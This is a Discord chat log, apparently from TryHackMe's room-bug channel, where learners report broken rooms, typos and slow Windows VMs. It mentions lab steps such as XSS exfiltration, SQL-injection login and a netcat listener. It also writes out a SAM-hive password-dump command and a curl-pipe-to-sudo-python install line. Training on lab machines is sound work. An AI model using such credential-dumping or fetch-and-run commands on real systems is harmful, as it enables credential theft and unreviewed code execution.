I terminated and deployed back the machine, the ssh service was available only after 5mins (literally) and had to wait 60 sec for password validation.
This task's machine seems to have performance issues.

civic brook
#

Day 20 is a windows host so it may take more than the 2 minute timer to load the box complete (up to 5 minutes sometimes), as far as box slowness not to sure there

void sleet
#

Is it normal that Lazy admin is a default apache2 page?

obsidian kiln
#

Yes

formal grail
#

For the Lian_Yu room the first actual question asks about a directory that doesnt exist, i checked write ups and found the directory its meant to be and it answered the question ||its 2100|| but the actual box itself doesnt have a ||2100|| file
I restarted the box as well

stiff notch
#

Anyone knows if this is a bug? It's task 25 and day 20

#

21 now :(

dusky junco
sick badger
#

Hello i have a problem for the box https://tryhackme.com/room/ra.
I have credentials for the smb and they worked but now no, i have reset the box a many time you have a idea ?

obsidian kiln
#

@sick badger the SMB can't be accessed unless you create credentials first. i.e. you need to login as the other user again, change the password, then login with SMB

#

When the box terminates that's it gone. There is no persistence. It resets when it dies.

sick badger
#

i create credentials with the website

topaz mauve
#

Are CC Radare2 room points in line with other rooms and their difficulty?

hazy tiger
#

Not a room bug but all rooms follow the same points system, difficulty does not affect the amount of points you receive for each room.

topaz mauve
#

I see, thanks. It just seemed a bit weird that you get ~2k points for one of the rooms 🙂

wraith ledge
eternal summit
wraith ledge
#

I can repaste. New here and not sure

left oak
#

Am thinking there is a bug in the overhauled RP Nessus room. The first question in task 5 does not take the right id,

tiny ginkgo
#

AOC 2020, DAY 20: In the example provided above, The path is provided of a Directory where the Select-String command operates on a file. A wildcard like this \desktop\* can be provided instead in the path to search for the given pattern in all the files present in the Directory.

silk hatch
#

The new Nessus room is not giving any points, is this intended behavior?

left oak
#

@silk hatch You did manage to fill in the first answer in task 5? Mind if I dm you?

silk hatch
eternal summit
#

@silk hatch that rule doesn't apply to walkthrough rooms, fwiw

silk hatch
left oak
#

thanks to @silk hatch I found the answer that is accepted.. But IMHO it is not the correct answer because this plugin is not used by default and in the task.

#

and the hint is certainly wrong for the accepted answer

silk hatch
#

I did ran into the same problem

void sleet
#

In Bounty hacker when i access the ftp and do commands as "ls" or "get" it doesnt run and some time forward it gives me a error

#

Already restarted the machine and still nothing

left oak
#

not a room bug I think. Did you consider what the ftp client tells you?

wheat fractal
#

the scylla.sh doesnt work, Not directly a room bug, but worth mentioning

crimson ore
#

Nmap room task 3, last question. I've answered '--script vuln' and confirmed is the expected answer by checking with writeups but it won't accept it.

north gyro
#

Hi, I'm doing room "Content security policy", in task 7 "attack 5" its required that we abuse a JSONP endpoint to achieve XSS.
the CSP header has script-src 'unsafe-eval' *.google.com now i have crafted a payload that works on myself, however it doesn't work on the bot that checks the site, my suspicion is that the remote machine doesn't have access to *.google.com and therefore my payload doesn't work.

I have confirmed, in my best effort that this machine doesn't have the necessary access to the internet, by trying to exfil to beeceptor

I believe this is a bug in the room. thanks, and yes i have checked the writeup!

obsidian kiln
#

@crimson ore you mean the writeups that are not accepted on the room and thus aren't condoned (for a reason)?

#

There's more than one way to specify that option. Look at the spaces in the answer field. Yes that is a correct answer, but it's not the one the room is looking for, and we don't have the option for multiple answers.

north gyro
#

@crimson ore the answer is actually pretty much given in the text of task 11 go forward and read it, lol fixed it

glacial aspen
#

if it's not can you redirect me to the good topic for it ? appreciate 😉

wheat fractal
#

it's the wrong answer

glacial aspen
#

okay thanks !

#

i tried for ages on that lol

#

like you said i was looking at the wrong place thanks

crimson ore
eternal summit
wheat fractal
#

"Note that the arguments are separated the commas, and connected to the corresponding script with period" ***** should replace "the" with "by" ---Inside Task 11

abstract timber
#

hey ! is anyone having troubles with the pickle rick web room ? website doesn't show up but I can see its source code

stoic hearth
#

Hi guys
I am doing the complete beginner path and on the Nmap room, task 3, last question (https://tryhackme.com/room/furthernmap), i have a wrong answer with a nmap switch I am 99.99% confident of it : --script vuln

drowsy stump
hazy tiger
#

how many characters are in the answer @stoic hearth

stoic hearth
#

13

hazy tiger
hazy tiger
#

12*

stoic hearth
#

i am sorry but i count 13 🙂

wheat fractal
#

-NMAP
-https://tryhackme.com/room/furthernmap
-Task 11
-There is a typo in the sentence "Note that the arguments are separated the commas, and connected to the corresponding script with period" --- suggest replacing the word "the" with "by" in my opinion 🙂

eternal summit
#

I don't think so

drowsy stump
#

I would write "Note that the arguments are separated by commas, and connected to the corresponding script with period"

eternal summit
#

Ok "the" was used several times and you didn't state which

hazy tiger
wheat fractal
#

That "the"

drowsy stump
#

i wrote the correct sentence

hazy tiger
#

There are 13 asterisks here, no spaces, which means the answer doesn't have a space.

eternal summit
hazy tiger
wheat fractal
#

^^^

#

Jabba got it

#

That's the "the" I'm talking about

stoic hearth
wheat fractal
#

either the word separated needs to be replaced or the word "the" it just doesn't make sense the way it's worded like that

#

anyway, back to my studies ....

teal barn
eternal summit
#

Aoc2 day 11

dusky junco
#

howdy

eternal summit
#

It's uh

#

Got a number

#

For some reason

dusky junco
#

That's peculiar

eternal summit
#

Especially how it renders.

#

Oooh, want an extra spicy bit of detail?

#

Pinged in the dev chat for it

dusky junco
#

How about now?

#

I know exactly what caused that

eternal summit
dusky junco
#

Ayyeeee wicked. Thanks @eternal summit

eternal summit
#

got another one in the devchat

teal barn
#

1GB RAM, 1 virtual thread of CPU, no graphic acceleration
Windows 10 can't run with that 😄

dusky junco
#

Thanks Noraj, unfortunately that's AWS -- it's very expensive. Is this straight after you login?

#

As well as for Day 21?

teal barn
#

20 min after boot

dusky junco
#

Interesting

teal barn
#

was 8min after boot for 21

dusky junco
#

Could you show the process that's causing the 100% usage please?

teal barn
#

too late

#

I noticed there was a windows update notification

#

all CPU is used by "System interrupts"

#

also just opening the windows menu make you rise from 5% to 100% CPU instantly

#

coz there is no graphic acceleration

#

so all rendering is done via the CPU

#

you should ask the authors of windows VM to setup the performance mode

dusky junco
#

Perfect yup (: This is something I've discovered over the last week and am trying to find the time to help automate to help windows box users with this

#

Appreciate you reporting this @teal barn

weary patio
#

Hi all, do I post here a small bug for the calendar event?

teal barn
#

by the way it is not enough as the resources are VERY low all options are nearly all disabled

#

so perf mode only disable the fonts

#

but on a normal desktop or laptop all the options are checked

dusky junco
#

Are you connecting via Windows by any chance Noraj?

teal barn
#

it means it will be useless to switch to perf mode

teal barn
dusky junco
#

Yes (: MS' RDP client

teal barn
#

no via remmina

#

as showed in the room material

#

I have even dropped the color depth from 32 bpp to the minimum of 8 bpp

dusky junco
#

Okay, I appreciate you reporting that back to me/us @teal barn

#

I really do

teal barn
#

sure np

dusky junco
#

I'm actively working on improving performance with windows boxes

teal barn
#

no feedback = no issue fixed, so I do my part

dusky junco
#

However, they are unfortunately super expensive to run in the cloud -- hence the low resources (even as a subscriber)

dusky junco
wheat fractal
#

hey guys when doing the internal room on tryhackme ii found ||the wordpress login page|| but when i try to || login with credentials it takes me to http://internal.thm/blog/wp-login.php|| which is not the machine im working with nor do i think it should be that link also the css of the site doesnt load

eternal summit
#

You need to add it to /etc/hosts

#

This is not a bug

#

This is user error

wheat fractal
#

oh sorry then my bad
what do i need to add to the hosts file?

eternal summit
#

That sounds like a research question. This is the channel for reporting room bugs, not a help channel.

wheat fractal
#

nvm

fresh basin
#

anyone else having the Windows RDP session run slower than a snail with asthma?

twin tapir
#

1.) you can scroll up like 1 message and see a conversation about it
2.) its being investigated
3.) windows I dont even know its just windows being windows

strong kelp
chilly igloo
#

Id like to report a bug in this room: https://tryhackme.com/room/linuxctf
Specifically flag 14. The filename has a typo. It's i'm assuming supposed to be flagfourteen.txt but it is actually flagtourteen.txt. Nothing major, but i did want to report this issue for those who might come across this same bug.

prisma venture
twin tapir
#

@prisma venture fixed

prisma venture
#

great room!

chilly igloo
#

Link: https://tryhackme.com/room/furthernmap
Task: 9
Question:
How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)
Answer: ||nmap -sn 172.16.0.0/16||
Accepted Answer Provided By Me: ||nmap -sn 172.16.0.0/||

So, it completely disregarded the /16 part of the question. Not sure if that intentional or not as it gave this /16 in the hint, but yea, figured you want to know.

obsidian kiln
#

@chilly igloo that's just answer tolerance on the site. We can't turn it off on a per question basis

chilly igloo
#

@obsidian kiln kk, i figured it was a little give there, but yea. I didn't know if it was intended or not, seeing how i'm a new user. 😛 Just wanted to make sure. Thanks for the reply! 😄

obsidian kiln
#

Np! Welcome 🙂

oblique hemlock
#

Link: https://tryhackme.com/room/furthernmap
Task: 3
Question:
How would you tell nmap to scan ports 1000-1500?
Answer: ||-p 1000-1500||
Accepted Answer Provided By Me: ||-p 1000-15000 (15k instead of 1.5k)||

hazy tiger
#

It's answer tolerance

#

If you refresh your page it will update

#

It's so that answers do not have to be perfect to be accepted

#

@oblique hemlock

#

It's regex, it can be disabled but it would make certain things like flag entry much harder and more strict

#

Always triple check the information you're getting from boxes

#

While commands are easy to change, accidentally mistyping someone's password isn't that easy to fix..

tight relic
#

Some of the images are broken in the JVM Reverse Engineering room

somber charm
#

Anyone having problem with the Alfred room, it says the root flag should be in C:\Windows\System32\config, but it's not there. I tried searching for it in the entire C:\ and it's just not there.

tawny tree
#

Advent of Cyber 2 windows VMs defaulting to Hindi instead of English

pine kernel
#

Hi, I just have completed advent of cyber 2 and i downloaded my certificate after completing but in the certificate it is showing my username which is hawkxfx but instead of that i want to showcase my full name cause i have to show it on my school...

timber bone
errant plover
#

Hello I found something which i dont know if reported . In Network Services 2 room while exploiting SQL , it says metasploit by default will test with "select module()" command , but actually it tests with "select version()" command

forest plover
#

Hey people, I have problems to find all ports in the Brainstorm-Room.

vale ferry
#

I already room in 22 rooms and completed 22 rooms. But still show me on profile Room Completed 21 .why ?

topaz thorn
#

Go through them some rooms may have updated with new questions

forest plover
topaz thorn
#

Not a bug, you need to drop the filter.js otherwise it won't let you upload

faint ridge
#

^^

signal sleet
#

ok thank you

wheat fractal
#

i want to report one question in the OSI topic 2nd question, it says packets in data link layer, isnt it frames instead of the "packets". i know that packets in the network layer.

#

So if its already not wrong,can anyone help me with that?

plucky nimbus
#

I've found what I believe is a mistake in one of the THM rooms.

eternal summit
#

@plucky nimbus Nope, it's not 60. That's hex. This isn't an error with the room

#

Not sixty, that might be a more accurate way of putting it

plucky nimbus
#

Can I have a nudge in the right direction?

eternal summit
plucky nimbus
#

I saw your hint, thanks

frail flare
#

Excuse me. This is the owasp top 10 task 20. I added script in the comments but why there is nothing? It should be something to click...I suppose

rugged yew
#

maybe its not even out yet

#

but on the description it just says "An introduction to Windows Event Logs and the tools to query them."

terse halo
#

Room: Metasploit, Task 7. I tried several times until I found an answer --> run autoroute -h showed we can either use CIDR notation or subnet mask with tack -n and -s respectively. So run autoroute -n IP_ADDRESS -s SUBNET_MASK or run autoroute -n IP_ADDRESS/8(etc) should be used. I tried running the submitted command but was not valid.

eternal summit
#

@terse halo Refresh?

terse halo
prime helm
twin tapir
#

@dusky junco

dusky junco
#

Lmao oops! Sorted (: thanks @prime helm @twin tapir

faint ridge
prime helm
eternal summit
#

@prime helm That's @obsidian kiln's room rather than one from Dark

prime helm
#

sry ^^'

obsidian kiln
#

Oh, danke -- I'll fix that now 👍

manic shoal
#

room agent sudo wont accept CVE, i also used the one i saw in the writeup still doesnt work?

#

CVE i used : CVE-2019-14287

eternal summit
manic shoal
#

oh im sorry, i thought this channel was more suitable

eternal summit
#

That's the correct answer and it will work in the form @manic shoal

#

If it does not, that's a site bug and not a room bug.

#

I have the correct answer RN

manic shoal
#

well it doesn't want to accept for me i thought it's a room bug, sorry :/

eternal summit
#

@manic shoal Check your dev console to see if there's any errors there

#

And try reloading the page

#

It might just be cloudflare being a pain

manic shoal
#

after couple of retries it works

#

thank you for the help

eternal summit
#

Prolly cloudflare being a pain

lime vapor
#

Not quite a bug, but more of a suggestion:

Several people have run into an issue with the NMap Room, under the NMap switches section, specifically the question "How would you activate all of the scripts in the "vuln" category?". The answer is correct, however, in quite a few places online (found when Googling), the same switch has a space, and in some places, it does not. This could confuse some users on which answer to put. My suggestion was to add a hint that informed them to enter the answer without spaces. I think that this might clear it up for some people.

Thank you!

obsidian kiln
lime vapor
#

@obsidian kiln - thank you! I think sometimes we miss the obvious :)

north gyro
north gyro
obsidian kiln
#

@north gyro they already are. Somewhat ironically, this is one of the few cases where the regex doesn't make it accept a technically incorrect answer.

north gyro
#

"Based on the output"

plucky nimbus
#

Right, I should probably include the output. Let me edit.

#

Output added

north gyro
#

ok so look in the line MATCHES:

plucky nimbus
#

I... should just go climb into a hole. I thought that was Strl, as L like lima.

north gyro
#

all done?

plucky nimbus
#

Yep.

north gyro
#

👍

dusky junco
#

Hey if anyone experiences Windows boxes terminating/shutting down after an hour (even though the timer says 2 hours or you've extended it), please @ me with the room code / URL

tiny knot
#

Linux Strength Training, Task 5

'encoded.txt' is not on the deployed machine. Unable to complete the task without it.

tiny knot
#

Then where is the file? Did they changed the name and forgot to update the question?

latent vessel
#

Nope

#

Come in room-hints

terse halo
#

Room: Hydra---> login keyword is missing in between "/" and ":". Not a bug, more of a correction 🙂

eternal summit
#

Or a correction

#

If you're sending the data to / then it's perfectly correct

#

It's an example. Not for a specific webapp

terse halo
#

Oh okay gotcha

oblique hemlock
#

After how many minutes can i conclude that the machine is not booting up? On the page it says "it may take up to 3 minutes to boot", and it has been 10mins already and nothing has happened. it is the /room/hydra machine

slate parrot
#

I am completing the CC:Penetration Testing room, and am on Task 18. Although I have been able to enumerate the DB and tables, it seems that the table containing the flag is empty. I have re-deployed the instance twice, but the tests table is empty. Is this a machine bug?

hazy tiger
#

This isn't a Machine bug

#

It's a bug with your SQLMAP

#

Install it from the repo on GitHub and try running it with python sqlmap.py, not sure why this happens but it's a bit of a pain

#

*would like to add this fix doesn't always work, you may need to play around with it

slate parrot
slate parrot
slate parrot
slate parrot
#

I think they're investigating issues with Windows boxes stopping abruptly at the moment. @dusky junco

tulip basalt
viral cobalt
#

HTTP is technically a protocol,

#

and its likely answer tolerance @Sin

#

refresh and it'll be fixed

#

the question should definitely be "what software is the server running"

eternal summit
tulip basalt
#

Oh, I've never noticed that was a thing before, okay sorry to bother!

viral cobalt
#

99% of "oh it accepted the wrong answer" is answer tolerance

zinc cradle
#

it says this is wrong in the linux enumeration room but im sure it is. Am i right or am i being a bit daft here its the same on GTFObins

eternal summit
#

Those quotes don't look correct

#

"

#

There's a normal double quote for you

zinc cradle
#

me?

eternal summit
#

Who else?

zinc cradle
#

mad ghost

#

anyway

#

idk coz its the same everywhere else i google

eternal summit
#

They just don't look like normal single and double quotes

#

" '

#

There you are

zinc cradle
#

and the change in quotes would be '' for the script its executing and the "" for specifying inside the script what the shell should be

#

they are

tulip basalt
#

this probably isn't a bug? I'm redoing this linux thing, I did it before when it was all 1 room with a bonus at the end, the 2nd paragraph is already completed upon beginning this ?

eternal summit
zinc cradle
#

ah i refreshed a few times and it accepted the answer

#

really really weird

dusky junco
trail bramble
#

room:Intro to Windows(intro2win)
Task7

Policies > Windows Settings > Security Settings > Users Right Assignment
should be written below
Policies > Windows Settings > Security Settings > Local Policies > Users Right Assignment

dusky junco
#

You're right -- thanks @trail bramble could you also do me a huuuuuge favour and check to see if the license is expired for that please? Should say on the desktop / computer properties

#

Saves me booting it up to take a look if you wouldn't mind 😄

#

But I'll resolve the above now ^

#

Saves me booting it up to take a look if you wouldn't mind 😄
Actually don't worry about this (:

trail bramble
#

Thanks for quick fixing.✨

dusky junco
#

Also gonna look into getting that to boot with more resources because owch

#

That's the one! ^ Thanks so much

trail bramble
#

Not at all.🎄

dusky junco
#

It could defo do with more RAM

static gull
#

Having a weird problem in the Skynet room:

#

the credentials should work, I even checked with the writeup

twin tapir
#

@dusky junco is this whole thing because we're using evaluation ISOs and not legit ISOs?

#

I've noticed the ones that aren't evaluations haven't really had problems

dusky junco
#

Yeah that's my understanding @twin tapir

#

We rely on BYOL atm

twin tapir
#

It's hard to get real ISOs without other things

dusky junco
#

I'm pretty sure I've butchered the explanation of why it doesn't work but yea at least that's somewhat a part of the fix for it that I gotta do

#

I think the import process breaks it to some extent too

#

So when you've had stuff spun up on AWS that's why it's peachy

oblique hemlock
#

are room typos welcome in this channel?

eternal summit
#

Yes

#

Room, task, question?

#

@dusky junco 👀 typo plz

dusky junco
#

Dispatched

#

resolved 👍

steel monolith
#

Searchlight - IMINT
Last flag is broken

#

i was sure i was right so i went on one of the writeups linked and copy and pasted the flag and it didnt work lol might be just me or it might be broken

glad badger
#

/room/dockerrodeo Task 4 typo: "Before we being exploiting a Docker Registry" change to "Before we begin exploiting a Docker Registry" @dusky junco

dusky junco
#

thanks @glad badger

chilly kelp
wheat fractal
#

The Hacking with Powershell room has all the files used for the challenges listed under recent files. which makes it easy not to use powershell. not sure if it's really a bug but more of a touchup

twin tapir
#

You're only going to be hurting yourself

south star
#

Potential bug(s) in Linux: Local Enumeration (https://tryhackme.com/room/lle). Anytime you lose the shell you cannot regain the shell without terminating and relaunching the machine. Additionally, task 6, on the first question, the hinted command(||find -type f -name “*.bak” 2>/dev/null||) does not yield results. I verified on walkthroughs this was the command others used to find the file.

bitter onyx
eternal summit
#

@bitter onyx it's not meant to

#

The instructions need to be modified

#

But corp is due a revamp IIRC anyway

#

In the meantime, host the file on a webserver on your machine

twin tapir
#

that room has a few problems with it the creator is no longer active here iirc

eternal summit
#

I think CMN is revamping it

bitter onyx
velvet linden
eternal summit
#

Refresh the page

#

That's answer tolerance

velvet linden
eternal summit
#

That's the name of one executable that is part of the service

thorn kindle
#

Windows Privesc's room - Task 9...The command given in the task was supposed to display the username and passwd, but it only show the username. I tried to ask around and no one seems to know why there isn't a passwd in the output.

eternal summit
lean jungle
#

In task 11 of Windows PrivEsc v1.0 room, I am supposed to install python-crypto via 'apt install', but it seems the repo does not exist. Is there any work around for this?

north gyro
north gyro
lean jungle
# north gyro use python3 `sudo apt install python3-crypto` python 2.7 is depreciated

Thanks for your help. I could install the python3-crypto. The next problem is that I think the script is written for python2.

└─$ python3 creddump7/pwdump.py SYSTEM SAM
  File "creddump7/pwdump.py", line 28
    print "usage: %s <system hive> <SAM hive>" % sys.argv[0]
          ^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("usage: %s <system hive> <SAM hive>" % sys.argv[0])?
thorn kindle
lean jungle
thorn kindle
north gyro
#

@lean jungle there is a program called 2to3 or something similar on Kali, which will produce a patch file, you could try that, or install pip for python2 and use that to install crypto

rustic geyser
#

Hello again peeps 😄
And i have another issue in room OWASP Juice Shop Task3 after login using SQL injection (direct typing in the field and via burp intercept) no flag is displayed :(.
I did logout and login, close and reopen browser without success 😐
Attached is a screen-cap to confirm that logon was successful.
I know i can google the answer/flag but that is not a fix.

Any suggestions/help ?
Thanks!

L.E. Restarting attack vm and target for another go 😐
L.L.E After restart and retry the flag appeared.

robust niche
eternal summit
#

@robust niche It's either

#

Not a bug

robust niche
#

Since the other may fail, the other may not, I'd say it's a bug

eternal summit
#

What.

robust niche
#

But it's a minor thing, whatever 🙂

eternal summit
#

They're literally the same except one doesn't do reverse DNS.

robust niche
#

-lvp might result in "nc: getnameinfo: Temporary failure in name resolution"

eternal summit
#

Ok. That's not a problem.

robust niche
#

Ok ok 🙂

lean jungle
lean jungle
#

I hope someone can tell me about alternative tools...sadcooctus

obsidian kiln
#

You know they exist now, so go hunting 🙂

lean jungle
lean jungle
#

Nop. It seemed it was working, but I've got 'incorrect'.

undone basin
#

Hi all, complete noob thing - https://tryhackme.com/room/linux2 Task 6 "What is the value of the home environment variable" imho should be "What is the value of the HOME environment variable"

trail merlin
#

Hello - In the wireshark room there is an issue with Task 7 - ARP traffic. The question asks to find the IP address for a specific MAC address (80:fb:06:f0:45:d7) in the capture file provided but the answer format doesn't match up to any IPs so no answer is correct.

timber bone
#

In day 16 of aoc, someone was having problems in that task and i just went to check it out and the web server in it is running on port 80, but it was supposed to run on port 8000

glad badger
#

@dusky junco ^^^

grim fossil
#

In room OWASPtop10 Task 25 question 2: I was able to get the admin flag at the admin dashboard without changing the userType cookie from "user" to "admin" - i assume, it's not meant to be like that?

trail merlin
eternal summit
#

@trail merlin Are there not multiple IPs shown in the ARP table?

#

Also if that's a /8 like it should be, the host part isn't just the last octet.

trail merlin
timid crane
#

In the Windows PrivEsc room task 9 I'm assuming we're looking for a registry entry named "DefaultPassword", unfortunately this entry does not seem to be there

thorn kindle
timid crane
#

it's just annoying that you can't 100% the room without that password

timid crane
#

but you can probably guess the password @thorn kindle

thorn kindle
timid crane
#

it's used for other tasks

thorn kindle
robust niche
lean jungle
north gyro
#

@lean jungle of course, it's solvable,

```
curl https://bootstrap.pypa.io/get-pip.py | sudo python -
```

to install pip, then

```
sudo pip install crypto
```

to install crypto extensions, follow the rest of the instructions as is.
or you could just use mimikatz which will do the same job, but runs in windows

velvet flare
#

Something buggy in one of the tasks in the OWASP Top 10 room. Task 29, the components with known vulnerabilities lab. Once the machine is deployed and I've navigated to the web app, everything works fine on initial load. But if I go anywhere on the site, the database breaks, and I get the error "Can't connect database No such file or directory". This also keeps the intended exploit from running and providing a shell. Redeploying is the only way I can find to fix the database. I've successfully completed the task, just wanted to pass the bug along.

lean jungle
north gyro
#

@lean jungle good job, there is always a solution™

woeful hawk
#

A very small typo, but on the https://tryhackme.com/room/lle task 3 it says: "Copy the content of the id_rsa.pub file and put it inside the authorized_key file on the target machine (located in .ssh folder).", while it should say authorized_keys (it correctly uses the plural in the paragraph before, but can cause unnecessary confusion as the file does not exist on the target box from the start)

novel plover
#

For Room: Retro, in PrivEsc portion, there's no option for me to open any browser. Followed the advice of @obsidian kiln based on @heavy spade's reco but still to no avail 😦

#

I've tried to restart the box/instance and still encounter the same issue.

next bluff
#

So you can easily make one yourself there

woeful hawk
silk hatch
#

Is the new Nessus room supposed to give points?

#

This one

obsidian kiln
#

Unlikely

verbal sedge
#

It's a walkthrough room; each task that requires an answer will give 8 points.

silk hatch
#

Is this expected behavior of the room?

obsidian kiln
#

Likely if it's a big room, yea

silk hatch
#

Ah, shame, I'm having an epic battle for the throne, that's why I was concerned about the monthly points

#

Thanks

verbal sedge
#

@silk hatch iirc walkthrough room points are not counted in the monthly leaderboard. Only CTF (correct me if I'm wrong @obsidian kiln)

wheat fractal
#

Hello,

#

I have found an error on this room: Introductory Networking

At **task 6**

At this question: What is the IP address?

Now the IP is an IPv6 IP: 2001:8d8:100f:f000::241
Not this IP: 217.160.0.152

#

you can try it yourself: do a ping muirlandoracle.co.uk

#

but you can find the good ip with a -4 so idk

eternal summit
#

@obsidian kiln your blog does IPv6 smh

#

Just gotta tell em to use ipv4

obsidian kiln
#

Mhm. I'll add that into the hint

proper surge
#

Hello, I may have found an error in the room "Buffer Overflow Prep" when using it with the AttackBox. Specifically, on Task 2, when I execute the "fuzzer.py" command as instructed, the AttackBox only is able to send 100 bytes before Immunity Debugger on the Target Windows VM terminates the oscp.exe file. However, when I go to execute the following sub-step involving exploit.py, I do not get the "EIP contains normal pattern" message in the log as the task says I should. Furthermore, when I go to look at the official writeups, it looks like those writeup authors are able to get "fuzzer.py" to go up into the thousands before oscp.exe is terminated on the Target Windows VM. Since the room's deployment, has an unexpected safeguard been deployed on either the Target Windows VM, or the Attackbox -> VM Network Infrastructure to kill a BOF fuzzing attempt?

eternal summit
#

No

proper surge
#

thanks for the prompt reply. I'll take another look at the "fuzzer.py" code to make sure I'm copying and pasting it into the AttackBox correctly.

eternal summit
#

You will need to use python2.7 on the box or similar

proper surge
#

ahh, that may be the issue then, as I was executing it using an older python version I think

eternal summit
#

python on the attackbox is Python3 because it's 202(0/1)

proper surge
#

ok, I'll look further into the python command to make sure the file is executed using the right python version. Thank you!

proper surge
# eternal summit Newer.

I'm confirming that the incorrect python version was the issue. Running with "python2 fuzzer.py" resolved the issue. Given that the task provides very specific commands to be executed (since it's a beginner room), may I recommend that the text be slightly revised to indicate that the python file needs to be run using Python2? Thanks again for the prompt assistance!

eternal summit
#

The convention always was python was 2.7 and python3 was python3.x

#

This has changed because python2.7 is unsupported. A lot of exploits are still written in python2 though. It's a major issue.

proper surge
wheat fractal
oblique hemlock
#

I read somewhere a few days ago that windows boxes were acting funny but now I'm trying to do Pickle Rick CTF and it keeps crashing every minute or so. Is that also with linux boxes or is it just this one?

eternal summit
#

Nope I'd recommend asking for help in the help chats

oblique hemlock
#

but I don't really need help, I just need it to stop crashing 😄

wheat fractal
#

Having an issue with SimpleCTF - When I do a port scan, I get back 2 ports under 1000, 21, and 80, but the questions are expecting SSH to be listed as the highest port (22) Currently connected at 10.10.197.123

slate parrot
#

In Web Scanning, Task 3, Question "Featured in various rooms on TryHackMe, Cross-Site Scripting is a vicious attack ...", the AttackBox version of ZAP does not provide the expected answer of ||Web Browser XSS Protection Not Enabled|| -- see screenshot. I have re-run the scan twice, including in ATTACK mode.

eternal summit
eternal summit
wheat fractal
#

But that is one that is being deployed. I tried it twice.

eternal summit
#

Scan with -p-

oblique hemlock
obsidian kiln
#

@wheat fractal fix 😁

wheat fractal
#

hello! A small bug in room kenobi, Task 1 question: the number of expected open ports is single digit, which is correct if you run nmap <ip> -vv , but with nmap -p- <ip> you get 11 open ports, which seems technically more accurate 🙂

wheat fractal
#

another small typo: "Which is actually a version of /usr/sh" -> "Which is actually a version of /bin/sh", no?

glad plume
#

https://tryhackme.com/room/sqlibasics

Task 6 gives examples of true and false sqli payloads but they both resolve to 'true' and the parameter is not actually susceptible to SQLi according to 'Damn Small SQLi Scanner'

```
Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.3b
 by: Miroslav Stampar (@stamparm)

* scanning GET parameter 'id'

scan results: no vulnerabilities found
```
whole prairie
# north gyro <@!414311709142941697> of course, its solvable, ``` curl https://bootstrap.pypa...

Hi @north gyro, I have the same (I think) issue as @lean jungle at task 11 of Windows PrivEsc room: The

sudo apt install python-crypto

command returns that

E: Unable to locate package python-crypto

So, I tried to install crypto pack instead as you suggested with pip:

sudo pip install crypto

Which is installed, but the final command is still not working:
python2 creddump7/pwdump.py SYSTEM SAM returns:

ImportError: No module named Crypto.Hash

#

Any ideas?

lean jungle
eternal summit
whole prairie
whole prairie
whole prairie
lean jungle
# whole prairie So <@!414311709142941697> how did you installed pycrypto? After <@!3982970840943...

Yes. I think I have encountered that. Sorry, I don't remember how I fixed it. So, I tried the same with a new Kali in-browser box now and it worked.
||
```
root@kali:~# pip install pycrypto
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Collecting pycrypto
  Downloading pycrypto-2.6.1.tar.gz (446 kB)
     |████████████████████████████████| 446 kB 13.8 MB/s
Building wheels for collected packages: pycrypto
  Building wheel for pycrypto (setup.py) ... done
  Created wheel for pycrypto: filename=pycrypto-2.6.1-cp27-cp27mu-linux_x86_64.whl size=525217 sha256=fb6071b7be726dcefb2f196ec346890b0455f389dfc65f508b99834a03d87602
  Stored in directory: /root/.cache/pip/wheels/b6/e6/c8/d1eca13628952ceec1d40d96e0a7a1380460d2349ce0b85312
Successfully built pycrypto
Installing collected packages: pycrypto
Successfully installed pycrypto-2.6.1
root@kali:~#
```
||

#

FYI, it is working on my local kali VM.

north gyro
#

@whole prairie i need more of the error message to be sure but try sudo pip install wheel

rigid cargo
#

On /room/owasptop10, Task 20, "On the same page, create an alert popup box appear on the page with your document cookies." question doesn't work.

wheat fractal
#

it does work, at least it did for me

#

u may be using wrong script or try restarting the machine

rigid cargo
#

If it's working for others then there must be something wrong with my environment I guess, I've tried this a few times. I'll go back and do screenshots another time

wheat fractal
#

ok

woeful hawk
#

Perhaps not much of an error, but on the https://tryhackme.com/room/windows10privesc the path to the smbserver.py (task 2) is not valid for the THM attack boxes, that version of kali needs the command to be python3 /opt/impacket/examples/smbserver.py kail .

#

It's also a bit problematic that the suggested port (53) is bound on the attack box: tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 815/systemd-resolve

zealous vortex
#

Look at the cmd provided there is an extra curly braces....
I was copy pasting and thinking of network issues but it was different:joy: :joy:

It is in beginners path linux local enumeration

eternal summit
woeful hawk
eternal summit
#

@woeful hawk It's pretty usual to have the local DNS server listening on 127.0.0.1:53.

#

Listening on a different interface will fix it

woeful hawk
#

yes I got that working too, thanks for the help and the location of the smbserver.py wasn't that much of a "bug" really to start with (don't know what severity of errors should be reported)

tired pendant
#

@warped talon OWASP Juice Shop Task 5 #3 I have obtained a flag for downloading one of the .bak files but the flag says it's incorrect as per @sonic rover and I have downloaded the other .bak file but flag was not given at all. Can you please clarify where the flag actually is?

wild bramble